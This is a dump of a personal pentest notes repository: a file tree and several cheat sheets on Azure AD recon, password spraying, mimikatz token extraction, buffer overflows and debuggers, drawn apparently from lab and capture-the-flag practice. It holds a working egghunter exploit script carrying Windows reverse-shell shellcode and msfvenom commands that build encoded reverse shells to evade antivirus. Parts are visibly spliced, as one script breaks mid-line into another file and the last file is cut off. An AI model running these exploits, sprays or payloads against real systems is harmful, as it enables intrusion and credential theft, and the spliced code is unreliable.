├── LICENSE
├── README.md
├── azure_ad
│   ├── azurehound.txt
│   ├── enumeration.txt
│   ├── initial_access.txt
│   ├── post_exploitation.txt
│   └── recon.txt
├── binary_exploitation
│   ├── buffer_overflow
│   │   ├── egg_hunting
│   │   │   ├── bighead.py
│   │   │   ├── info.txt
│   │   │   └── vulnserver.py
│   │   ├── immunityDbg.txt
│   │   ├── linux
│   │   │   ├── guide.txt
│   │   │   ├── htbNodeOverflow.py
│   │   │   └── htbOctoberOverflow.py
│   │   ├── msfvenom.txt
│   │   ├── nasmShell.txt
│   │   ├── patternCreate.txt
│   │   ├── patternOffset.txt
│   │   ├── remote_overflow.py
│   │   ├── remote_overflow.txt
│   │   ├── rop.txt
│   │   └── windows
│   │       └── slMail.txt
│   └── reverse_engineering
│       ├── gdb.txt
│       ├── ghidra.txt
│       ├── radare2.txt
│       └── recon.txt
├── bruteforce
│   ├── 7zCrack.sh
│   ├── fcrackzip.txt
│   ├── generateWordlist.txt
│   ├── hashcat.txt
│   ├── hydra.txt
│   ├── john.txt
│   ├── openssl.txt
│   ├── padbusterCookie.txt
│   ├── password-spray.txt
│   ├── patator.txt
│   ├── pdfCrack.txt
│   └── rdp.txt
├── certificates
│   ├── generateCA.txt
│   └── openssl.txt
├── databases
│   ├── nosql
│   │   └── mongo
│   │       └── mongo.txt
│   └── sql
│       ├── blindSqli.py
│       ├── blindSqli.txt
│       ├── mssql
│       │   ├── mssql.txt
│       │   ├── mssqlclient.txt
│       │   └── sqsh.txt
│       ├── mysql.txt
│       ├── oracle
│       │   ├── cli.txt
│       │   ├── odat.txt
│       │   ├── oscanner.txt
│       │   ├── sqlplus.txt
│       │   └── tnscmd.txt
│       ├── postgresqlCli.txt
│       ├── sqli.txt
│       └── sqlmap.txt
├── defense_evasion
│   └── amsi
│       ├── AmsiInitFailed.ps1
│       ├── AmsiPatchInMemory.ps1
│       └── OverwriteAmsiContext.ps1
├── development
│   ├── cross-compile.txt
│   └── nasm.txt
├── file_inclusion
│   ├── lfi.txt
│   └── uploadFile.txt
├── filetransfer
│   ├── base64.txt
│   ├── dev_tcp.txt
│   ├── ftp_commands.txt
│   ├── ftp_server.txt
│   ├── http_server.txt
│   ├── nc.txt
│   ├── nginx_file_transfer.txt
│   ├── nginx_setup.txt
│   ├── rsync.txt
│   ├── scp.txt
│   ├── smb.txt
│   ├── smb_server.py
│   └── windows
│       ├── tftp.txt
│       ├── vbs.txt
│       ├── web_request.txt
│       ├── webrequest.txt
│       ├── wget.txt
│       └── winrm.txt
├── forensics
│   ├── convert.txt
│   ├── dit.txt
│   ├── luks_encrypted.txt
│   └── volatility.txt
├── git
│   └── git.txt
├── google_dorks
│   └── dorks.txt
├── infrastructure
│   ├── linux.txt
│   └── windows.txt
├── ldap
│   ├── blind_ldap_injection.txt
│   └── recon.txt
├── mail
│   ├── imap
│   │   └── imapCurl.txt
│   ├── sendemail.txt
│   └── smtp
│       └── smtp.txt
├── metasploit
│   └── metasploit.txt
├── networking
│   ├── firewall.txt
│   ├── iptables.txt
│   ├── netdiscover.txt
│   ├── packets
│   │   ├── capturePackets.py
│   │   ├── icmpReadFile.txt
│   │   └── sniffPackets.py
│   ├── route.txt
│   ├── tcpdump.txt
│   └── vm_bridge.txt
├── nfs
│   ├── mountShares.txt
│   └── showmount.txt
├── package_injection
│   └── package_injection.txt
├── persistence
│   ├── linux
│   │   ├── ssh.txt
│   │   └── techniques.txt
│   └── windows
│       ├── schtasks.txt
│       └── wmi.txt
├── pivoting
│   ├── chisel.txt
│   ├── meterpreter.txt
│   ├── ncat.txt
│   ├── portForwarding.txt
│   ├── socat.txt
│   ├── ssh.txt
│   ├── sshuttle.txt
│   └── windows
│       ├── netsh.txt
│       ├── plink.txt
│       └── wmic.txt
├── port_knocking
│   └── portKnock.txt
├── post_exploitation
│   └── windows
│       ├── com_hijack.txt
│       ├── disable_monitoring.txt
│       ├── fgdump.txt
│       ├── mimikatz.txt
│       └── schtasks.txt
├── privesc
│   ├── linux
│   │   └── find-suid.txt
│   └── windows
│       ├── hashdump.txt
│       ├── sherlock.txt
│       └── unquoted-service-paths.txt
├── recon
│   ├── curl.txt
│   ├── dns.txt
│   ├── droopescan.txt
│   ├── enum4linux.txt
│   ├── gobuster.txt
│   ├── iis_shortname.txt
│   ├── masscan.txt
│   ├── nbtscan.txt
│   ├── ncat.txt
│   ├── netstat.txt
│   ├── nikto.txt
│   ├── nmap.txt
│   ├── onesixtyone.txt
│   ├── openvas.txt
│   ├── password_gathering.txt
│   ├── recon-ng.txt
│   ├── reconsteps.txt
│   ├── smtp_enum.txt
│   ├── snmpwalk.txt
│   ├── theharvester.txt
│   ├── usernames.txt
│   ├── webdav.txt
│   ├── wfuzz.txt
│   └── wpscan.txt
├── remote_connection
│   ├── ftp.txt
│   ├── psExec.txt
│   ├── psRemoting.txt
│   ├── pth-winexe.txt
│   ├── remote_desktop.txt
│   ├── scp.txt
│   ├── ssh.txt
│   ├── telnet.txt
│   ├── winrm.rb
│   ├── winrm.txt
│   └── winrm_cert.rb
├── restricted_shell
│   └── methods.txt
├── reverse_shell
│   ├── interactive_shell.txt
│   └── msfvenom.txt
├── scripts
│   ├── assembly2shellcode.sh
│   ├── blind_nosqli.py
│   ├── blind_sqli.py
│   ├── byte_order_converter.py
│   ├── checkPort.py
│   ├── convert_to_vbs.py
│   ├── decryptRSA.py
│   ├── ipScan.sh
│   ├── iraw2png.pl
│   ├── pingNetwork.py
│   ├── pingNetwork.sh
│   ├── portscan.py
│   ├── portscan.sh
│   ├── printAllAscii.py
│   ├── printAllAscii.sh
│   ├── psMonitor.sh
│   ├── setuid.c
│   ├── smbver.sh
│   ├── smtpVrfyUserList.py
│   ├── smtpVrfyUsers.py
│   ├── socketShell.py
│   ├── split_binary.sh
│   ├── subnetscan.ps1
│   ├── subnetscan.sh
│   └── zonetransfer.sh
├── smb
│   ├── mount_shares.txt
│   ├── rpcclient.txt
│   ├── setup.txt
│   ├── smb_relay.txt
│   ├── smb_scf.txt
│   ├── smbclient.txt
│   ├── smbmap.txt
│   └── version.txt
├── tokens
│   └── jwt.txt
└── windows
    ├── active_directory
    │   ├── asreproasting.txt
    │   ├── bloodhound.txt
    │   ├── constrained_delegation.txt
    │   ├── getDomainController.txt
    │   ├── group_policy_objects.txt
    │   ├── kerberoasting.txt
    │   ├── powerview.txt
    │   ├── recon.txt
    │   ├── rubeus.txt
    │   ├── tickets.txt
    │   ├── unconstrained_delegation.txt
    │   └── writeDACL.txt
    ├── ads.txt
    ├── base64.txt
    ├── check_antivirus.txt
    ├── check_architecture.txt
    ├── check_services.txt
    ├── constrained_powershell_bypass.txt
    ├── crackmapexec.txt
    ├── create_account.txt
    ├── download.txt
    ├── dpapi.txt
    ├── enable_rdp.txt
    ├── file_permissions.txt
    ├── get_os.txt
    ├── llmnr.txt
    ├── mssql.txt
    ├── pass_the_hash.txt
    ├── powershell_language_mode.txt
    ├── prompt_credentials.txt
    ├── putty.txt
    ├── rdesktop.txt
    ├── reg_query.txt
    ├── rlwrap.txt
    ├── runas.txt
    └── switch_user.txt

/README.md:
Here are all my personal notes I made during my pentest learning experience since the very beginning.
=====================================================================================================

/azure_ad/azurehound.txt:
Azurehound is Bloodhound's Azure and Azure AD attack path mapper.

Use Azurehound to map out the Azure infrastructure:
Step 1: Azurehound uses both Azure AD as well as Az Powershell, so we need to connect both
syntax : $passwd = ConvertTo-SecureString "" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential("@", $passwd); Connect-AzureAD -Credential $creds; Connect-AzAccount -Credential $creds
example: $passwd = ConvertTo-SecureString "S3cureP@ss!" -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential("hr@ecorp.com", $passwd); Connect-AzureAD -Credential $creds; Connect-AzAccount -Credential $creds

Step 2: Import Azurehound and let the dog loose
example: Import-Module C:\Tools\Azurehound\Azurehound.ps1
         Invoke-AzureHound -verbose
Step 3: Open Bloodhound and drop the resulting zip folder in there

/azure_ad/initial_access.txt:
Inspired by Pentester Academy - Attacking and Defending Azure Active Directory
Ways to get initial access into Azure Active Directory:

Password spray on previously enumerated email accounts:
Step 1: clone https://github.com/dafthack/MSOLSpray
Step 2: import module into Powershell session
example: Import-Module C:\Tools\MSOLSpray\MSOLSpray.ps1
Step 3:
syntax : Invoke-MSOLSpray -UserList -Password -Verbose
example: Invoke-MSOLSpray -UserList emails.txt -Password 'Sup3rS3cureP@ss!' -Verbose

/azure_ad/post_exploitation.txt:
Commands to use after exploiting an Azure AD-joined machine:

Mimikatz:
Extract Primary Refresh Token, session key, tenant ID:
example: mimikatz "privilege::debug" "sekurlsa::cloudap" exit

Extract context key and derived key (use session key from sekurlsa::cloudap command):
syntax : mimikatz "privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue: /unprotect" exit
example: mimikatz "privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:"AQAAA..." /unprotect" exit

/azure_ad/recon.txt:
Inspired by Pentester Academy - Attacking and Defending Azure Active Directory
Numerous commands to do OSINT recon on Azure Active Directory (most, if not all, tools listed here are in Powershell):

Check if an Azure Tenant exists and if it does, get information about it:
syntax : https://login.microsoftonline.com/getuserrealm.srf?login=@&xml=1
example: https://login.microsoftonline.com/getuserrealm.srf?login=non-existent@ecorp.com&xml=1

Get the tenant ID:
syntax : https://login.microsoftonline.com//.well-known/openid-configuration
example: https://login.microsoftonline.com/ecorp.com/.well-known/openid-configuration

Gather information using AADInternals:
Step 1: clone https://github.com/Gerenios/AADInternals
Step 2: import the module in your Powershell session
example: Import-Module C:\Tools\AADInternals\AADInternals.psd1
Step 3: use the tool
Get information about the tenant and check validity of username
syntax : Get-AADIntLoginInformation -UserName @
example: Get-AADIntLoginInformation -UserName admin@ecorp.com

Get the tenant domains:
syntax : Get-AADIntTenantDomains -Domain
example: Get-AADIntTenantDomains -Domain ecorp.com

Get some general public information we can gather about a tenant
syntax : Invoke-AADIntReconAsOutsider -Domain
example: Invoke-AADIntReconAsOutsider -Domain ecorp.com

Enumerate email addresses:
Step 1: clone https://github.com/LMGsec/o365creeper
Step 2:
syntax : python.exe C:\Tools\o365creeper\o365creeper.py -f -o
example: python.exe C:\Tools\o365creeper\o365creeper.py -f emails.txt -o valid.txt

Enumerate Azure Services:
Step 1: clone https://github.com/NetSPI/MicroBurst
Step 2: import the module in your Powershell session
example: Import-Module C:\Tools\MicroBurst\MicroBurst.psm1
Step 3: use the tool
Enumerate subdomains for an organization:
syntax : Invoke-EnumerateAzureSubDomains -Base -Verbose
example: Invoke-EnumerateAzureSubDomains -Base ecorp -Verbose

/binary_exploitation/buffer_overflow/egg_hunting/bighead.py:
#!/usr/bin/python

# This script is taken from Ippsec's Bighead video (https://www.youtube.com/watch?v=VBt-CmjMYiM)
# The egghunter might take a while to find the actual shellcode (could take 5-10 mins)

import requests

rhost = 'dev.bighead.htb'
rport = '80'
url = 'http://' + rhost + ':' + rport

jmp_esp = '\xf0\x12\x50\x62' # 0x625012f0
jmp_eax = '\xf2\x12\x50\x62' # 0x625012f2

# The egghunter will look through the target machine's memory for 'w00tw00t', then when it finds it,
# it executes the shellcode that comes after it
egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
egghunter += '\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7'

# a 'nopsled' the size of 'EIP overwrite' ("A"*72) divided by 2, because it's two characters
nopsled = '\x90' * (72 / 2)

# Windows stageless reverse shell payload
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.123 LPORT=443 -f python -v shellcode
shellcode = "w00tw00t" # This is what the egghunter will look for, then it will execute the shellcode after it
shellcode += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
shellcode += "\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
shellcode += "\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
shellcode += "\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
shellcode += "\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
shellcode += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
shellcode += "\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
shellcode += "\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
shellcode += "\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
shellcode += "\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
shellcode += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
shellcode += "\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77"
shellcode += "\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shellcode += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
shellcode += "\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
shellcode += "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0a"
shellcode += "\x0e\x09\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56"
shellcode += "\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c"
shellcode += "\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5"
shellcode += "\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
shellcode += "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
shellcode += "\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56"
shellcode += "\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f"
shellcode += "\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08"
shellcode += "\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
shellcode += "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shellcode += "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

payload = (nopsled + jmp_esp + egghunter).encode('hex')

#fuzz = ''
#fuzz += 'A' * (72 - 8)
#fuzz += 'B' * 8
#fuzz += 'C' * 8
#fuzz += 'D' * 80

# print payload

# Spray the shellcode, then the egghunter can look for it
for i in range(0, 5):
    print 'Spray ' + str(i)
    requests.post(url, data=shellcode)
###

# With this proxy, we can intercept the outgoing http request with burp and remove
# stuff that might take up our buffer space
proxy = {'http':'127.0.0.1:8080'}

print 'Sending payload...'
r = requests.head(url + '/' + payload, proxies=proxy)
print payload
print r.text

/binary_exploitation/buffer_overflow/egg_hunting/info.txt:
info about egghunting: https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
ippsec bighead video : https://www.youtube.com/watch?v=VBt-CmjMYiM

If you are doing binary exploitation and the target buffer size is too small for your whole payload, you will want to use an egghunter.

Find egg via mona in immunity debugger:

# "w00tw00t" is a common string used as an egg (deadbeef as well)
syntax : !mona find -type asc -s ""
example: !mona find -type asc -s "w00t"

Create egghunter via mona in immunity debugger:

# If your egg is "w00tw00t", it suffices to only specify "w00t"
syntax : !mona egg -t ""
example: !mona egg -t "w00t"

/binary_exploitation/buffer_overflow/immunityDbg.txt:
Immunity debugger is used when you have to analyze a running process

Setting up immunity debugger:

Step 1 : Run immunity as administrator
Step 2 : File -> attach -> attach the process you need
Step 3 : Press play to run the program (top left somewhere)
Optional: Change appearance


Setting up mona (https://github.com/corelan/mona):

(from the github page)
Step 1 : Drag 'mona.py' into the 'PyCommands' folder inside the 'Immunity Debugger' application folder
         (C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands)

Step 2 : Install Python 2.7.14 (or a higher 2.7.xx version) into c:\python27, thus overwriting the version
         that was bundled with Immunity. This is needed to avoid TLS issues when trying to update mona.


Using immunity debugger:

Place breakpoint: F2
Follow expr : Click the right arrow pointing to the four vertical dots in the top bar (->:) and enter an address.


Using Mona:

Get modules : !mona modules
Find jmp ESP: Go to executable modules list (click the 'e' at the top bar)
Search cmds : 'Right click assembly pane -> search for -> command/sequence of commands'
Check perms : Go to modules list (click on the 'm' at the top bar)
Find opcode : !mona find -s "" -m # example: !mona find -s "\xff\xe4" -m slmfc.dll

/binary_exploitation/buffer_overflow/linux/guide.txt:
See the 'overflow.py' binary and Ippsec's 'Hackthebox October' video! (https://www.youtube.com/watch?v=K05mJazHhF4)

Simplistic view of steps needed to do a buffer overflow attack (first get the binary over to your host machine or to a copy of the victim machine):

Step 1: gdb ./ # example: gdb ./runme `python -c 'print "A"*200'`
Step 2: b main
Step 3: r (run)
Step 4: c (continue)


optionals : checksec (check security measures in place); si (switch to instructions); x/s 0x532b45 (check address); p system (get addr of system); searchmem /bin/sh (search for addr); disas main (disassemble main);
get sys addr: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
get /bin/sh : strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

check ASLR : ldd | grep libc # if the memory address changes every time, ASLR is enabled
disable ASLR: sudo echo 0 > /proc/sys/kernel/randomize_va_space # disable ASLR, which randomizes the libc memory address (requires root access)
exploit dev : locate pattern_ # /usr/share/../../pattern_create.rb
exploit dev2: /usr/share/../../pattern_create.rb -l 200 # generates a string, run it with the binary in gdb and get the break address
exploit dev3: /usr/share/../../pattern_offset.rb -q 62413762 # get offset of the memory address of the break caused by the pattern_create string (remove the 0x)

/binary_exploitation/buffer_overflow/linux/htbNodeOverflow.py:
#!/usr/bin/python
# This is the finished overflow script we use on the binary on the target machine (Hackthebox Node)
# Check Ippsec's 'Hackthebox October' video

from subprocess import call
import struct

binaryLoc = "/usr/local/bin/backup"
arg1 = "randomText"
key = "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474"

libcBaseAddr = 0xf75b0000 # libc address 'ldd /home/user/binary | grep libc'

systemOffset = 0x0003a940 # system address 'readelf -s /lib32/libc.so.6 | grep system'
exitOffset = 0x0002e7d0 # also from 'readelf -s ... | grep exit'
argShOffset = 0x00015900b # /bin/sh 'strings -a -t x /lib32/libc.so.6 | grep /bin/sh'

# ' --platform -p LHOST= LPORT= -f -o
example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.12.15.117 LPORT=6697 -f exe -o venom.exe


Generate encoded reverse shell payloads to bypass antivirus and exclude bad characters:

syntax : msfvenom -a --platform -p LHOST= LPORT= -e -b '' -f -v
example: msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f python -v shellcode
example: msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode
# EXITFUNC=thread is for remote BOF: when you close your reverse shell session, the target program won't crash

example: msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -i 9 -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode
# The -i flag specifies how many times the payload should be encoded

/binary_exploitation/buffer_overflow/nasmShell.txt:
Use nasm_shell to find the opcode equivalent to 'JMP ESP':

Step 1: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
Step 2: Type in the instruction and grab the opcode (jmp esp -> FFE4)

/binary_exploitation/buffer_overflow/patternCreate.txt:
Create a unique string buffer so we can see at what exact buffer length the target program crashes:

syntax : /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
example: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1500

/binary_exploitation/buffer_overflow/patternOffset.txt:
Crash the target application with the 'pattern_create' pattern, then copy the value at the EIP register to get the exact offset:

syntax : /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
example: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41414244

/binary_exploitation/buffer_overflow/remote_overflow.txt:
Steps needed to trigger a remote buffer overflow (example used was SLMail_5.5.0 with immunity debugger) (See ~/KaliPentestCommands/BufferOverflow/immunityDbg.txt)

Step 1 : Recreate the service on a virtual machine with the same OS version as the target's machine.
Step 2 : Fuzz the service (~/KaliPentestCommands/BufferOverflow/remote_overflow.py).
Step 3 : Use pattern_create and pattern_offset to find the exact location of the crash (take the 'EIP' value after the crash and use it with 'pattern_offset.rb').
Step 4 : Append characters after a string buffer of that offset size and check the EIP to confirm those characters landed there, then append more to see if they allocate memory.
Step 5 : Right click 'ESP' -> 'Follow in dump' to see memory.
Step 5 : Find bad characters using my 'remote_overflow.py' script.
Step 6 : Edit the badchars list in the 'remote_overflow.py' script and rerun the script every time (save the badchars and remove them from the list).
         You can find bad chars by doing 'follow dump' on 'ESP' and checking the hex dump: if it shows '01 02 03 FE' or something similar, '0x04' is a bad character.
         Repeat this until the hex dump lists all the characters in the 'badchars' list.

Step 7 : Use mona to find modules with ASLR and DEP disabled; the module's memory range shouldn't contain any bad characters.
         (addresses you use for this part should never contain bad characters)
         (!p mona modules)
Step 8 : Once you have found this module, go to the 'executable modules list' (e), then look for the module you found in step 7 and double-click on it
Step 9 : Right click the assembly pane -> 'search for -> command -> "jmp esp"' (if not found, 'search for -> sequence of commands -> "push esp \n retn"') (the \n is an actual newline)
Step 10: Go to 'modules list' (m) to check permissions
Step 11: Find the opcode equivalent to 'jmp esp' by using '/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb' with 'jmp esp' -> result: FFE4
Step 12: Search for the opcode with the mona command: !mona find -s "" -m # example: !mona find -s "\xff\xe4" -m slmfc.dll
Step 13: Look for an address with no bad characters and verify that it contains a 'jmp esp' instruction by clicking on the top bar '->:' button and entering the found address.
         Check the instruction for 'jmp esp'

Step 14: Add that address to your script's buffer where the address will overwrite EIP so that it will point to 'jmp esp'. This will eventually lead us to executing our shellcode.
         You have to reverse the address (x86 little endian format) and convert it to shellcode (5F4A358F -> \x8f\x35\x4a\x5f), then after the address, add more buffer chars.
         Python example: buffer = "A"*2606 + "\x8f\x35\x4a\x5f" + "C"*(3500-2610)

Step 15: Restart immunity and slmail, place a breakpoint on that found address (->:) and run the exploit again
Step 16: Generate shellcode, while avoiding bad characters
         # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.124 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' EXITFUNC=thread -f python -v shellcode

Step 17: Use this payload after the 'jmp esp' payload (maybe add a few 'nopsled(\x90)' chars) and add padding at the end

Examples of finished exploit script:

python pop3exploit.py 192.168.0.117 110

python pop3exploit.py 192.168.0.117 110 2700

python pop3exploit.py pattern 192.168.0.117 110 `python -c 'print "A"*2606 + "\x8f\x35\x4a\x5f" + "C"*(3500-2610)'`

python pop3exploit.py badchars 192.168.0.117 110 `python -c 'print "A"*2606 + "B"*4'`

python pop3exploit.py shellcode 192.168.0.117 110 `python -c 'print "A"*2606 + "\x8f\x35\x4a\x5f" + "\x90"*20'` `python -c 'print "C"*(3500-2606-10-341)'`

/binary_exploitation/buffer_overflow/rop.txt:
Useful stuff to know for exploiting binaries using ROP chains

Stack frame:
A stack frame with stack canary protection looks like this:



x86 assembly:
Arguments to functions are passed directly onto the stack in x86 architecture.

x86_64 assembly:
Arguments to functions are passed into RDI (arg1), RSI (arg2), RDX (arg3), RCX (arg4), R8 (arg5), R9 (arg6).
21 | If there are more than 6 arguments for a function call, the rest of the arguments are pushed directly on the stack. 22 | -------------------------------------------------------------------------------- /binary_exploitation/buffer_overflow/windows/slMail.txt: -------------------------------------------------------------------------------- 1 | Install SLMail 5.5 from this link: 2 | 3 | https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe 4 | Just click 'next' everywhere for the install 5 | 6 | 7 | Setup SLMail to be exploited: 8 | 9 | Step 1: open port 110 by adding new inbound/outbound rules or shut down firewall entirely 10 | Step 2: run 'slmail configuration' as administrator 11 | Step 3: run 'immunity debugger' as administrator 12 | Step 4: attach the slmail process to immunity with 'File -> Attach' 13 | Step 5: start the slmail with the 'play' button 14 | Step 6: run exploit 15 | Step 7: restart slmail service via config panel when needed 16 | 17 | -------------------------------------------------------------------------------- /binary_exploitation/reverse_engineering/gdb.txt: -------------------------------------------------------------------------------- 1 | Very handy gdb cheatsheet: http://users.ece.utexas.edu/~adnan/gdb-refcard.pdf 2 | Simplistic view of steps needed to do a buffer overflow attack (first get the binary over to your host machine or to a copy of the victim machine: 3 | 4 | Step 1: gdb ./ 5 | Step 2: main 6 | Step 3: r (run) # example: gbd ./runme `python -c 'print "A"*200'` 7 | Step 4: c (continue) 8 | 9 | 10 | optionals : checksec; si (switch to instructions); x/s 0x532b45 (check address); p system (get addr of system); searchmem /bin/sh (search for addr); disas main (disassemble main); 11 | get sys addr: readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system; 12 | get /bin/sh : strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh 13 | 14 | check ASLR : ldd | grep libc # if memory address changes 
every time, ASLR is enabled
disable ASLR: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space   # 'sudo echo 0 > /proc/...' does not work: the redirect is done by the unprivileged shell, not by sudo
exploit dev : locate pattern # find pattern_create.rb
exploit dev2: pattern_create.rb -l 200 # generates a string, run it with the binary in gdb and get the break address
exploit dev3: pattern_offset.rb -q 62413762 # get the offset of the memory address of the break caused by the pattern_create string (remove the 0x)


Alternate debugging of a binary for a buffer overflow exploit (binary forks when it crashes):

Step 1(term): ps -ef | grep <binary>
Step 2(term): gdb --pid=<pid>
Step 3(gdb) : show follow-fork-mode   # 'set follow-fork-mode child' to follow the forked child instead of the parent
Step 4(gdb) : show detach-on-fork
Step 5(gdb) : set detach-on-fork off   # keep both parent and child under the debugger
Step 6(gdb) : fuzz the binary to check where it crashes
Step 7(gdb) : x/10s and x/50s to see at what memory address the service crashes

commands:
info inferior    : show info about parents/children
inferior <n>     : switch to inferior <n>
x/10s <addr>     : show the next 10 strings starting at <addr>
x/10gx <addr>    : show the next 10 giant words (8 bytes each) from <addr> in hex, use this to see the stack space available for rop chains # send 200 characters, then do x/10gx $rsp to see how many are on the stack
x/40xb <addr>    : show the next 40 bytes from <addr> in hex (x/40s prints 40 strings, not hex)

Common gdb commands:

# run program
example: run | r

# display virtual memory space mapping (peda/pwndbg/gef command; plain gdb: info proc mappings)
example: vmmap
example: vmmap libc

# get all functions and their address
example: info functions

# get contents of all registers
example: info registers

# disassemble function
syntax : disassemble <function>
example: disassemble main
example: disas main

# show contents of object
syntax : print <expression>
example: print $rbp
example: print sayHello
example: print *0x7f776589

# examine memory locations (g = 8 bytes, w = 4 bytes, i = instructions)
syntax : x/<#units><format> <address>
example: x/100gx $rsp
example: x/20wx *0x7f776589
example: x/5i $rip # show the next 5 instructions from where rip is currently pointing

# breakpoint at function
syntax : break <function>

# set breakpoint at an offset inside a function
syntax : break *<function>+<offset>
example: break *main+154

# list and delete breakpoints
Step 1 : info b -> check the breakpoint number
Step 2 : del <num>

# step through the debugger (into calls)
example: s
# step over a function call
example: next
# finish the current function
example: finish

# continue until the next breakpoint
example: c | continue
--------------------------------------------------------------------------------
/binary_exploitation/reverse_engineering/ghidra.txt:
--------------------------------------------------------------------------------
Ghidra is an open-source reverse engineering tool released by the NSA.

To get started analysing a binary:

Step 1: File -> New Project -> Choose directory and project name
Step 2: File -> Import File -> Select the binary to disassemble
Step 3: Double-click the file to open it in the CodeBrowser and let Ghidra analyze it

Rewrite (patch) instructions:
# There is a bug in Ghidra which causes a patched program to segfault when exported. Work around it by importing the binary
in raw format.

Step 1: Find the desired function to rewrite
Step 2: Right click the instruction (assembly code in the middle screen) -> Patch instruction
Step 3: Rewrite the instruction (for example: change JNZ LAB_000011f4 to JNZ LAB_000023df)
Step 4: File -> Export Program
Step 5: Choose format and output directory/name
Step 6: Run the new program

Navigate to address:

Step 1: Navigation -> Go to
Step 2: enter address, label or expression
--------------------------------------------------------------------------------
/binary_exploitation/reverse_engineering/radare2.txt:
--------------------------------------------------------------------------------
Radare2 is a powerful command line reversing tool.
Below are the most common commands you need for reversing a binary:

Open binary in debug mode: r2 -d <binary>

Analyze binary: aaa (or aaaa for a deeper, slower analysis)

List function names: afl

List strings in binary: izz

View disassembled functions: VV (interactive graph view)
                             pdf
                             pdf @ <function> # pdf @ sym.main
                             V! (allows for setting of breakpoints and rewriting functions)

Rewrite an instruction (in debug mode + V!): move the target address to the top of the screen, then do 'wa <instruction>' # works like vi, you need to do ':' first, then write 'wa <instruction>'
Set a breakpoint (in debug mode + V!)     : move the target address to the top of the screen, then press 'F2'
                                          : or open the function in pdf mode (pdf @ main) and do 'db <address>'

Run program / continue until the next breakpoint: dc
Single-step one instruction                     : ds   # a bare 's' is seek, it does not step

Reopen in debug mode: ood

Rewrite strings in radare (must be same length to work properly):

Step 1: r2 -w <binary>
Step 2: iz
Step 3: w <new string> @ <address>
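The pattern_create / pattern_offset steps from gdb.txt above (and the peda variant in recon.txt) as working code. This is an added example, not part of the cheat sheet and not Metasploit's own implementation: it rebuilds the same Aa0Aa1... cyclic pattern in Python and looks a crashed register value up in it; the value 0x62413762 and the offset it yields are the only inputs, everything else is generic.

```python
#!/usr/bin/env python3
"""Pure-Python re-implementation of Metasploit's pattern_create.rb and
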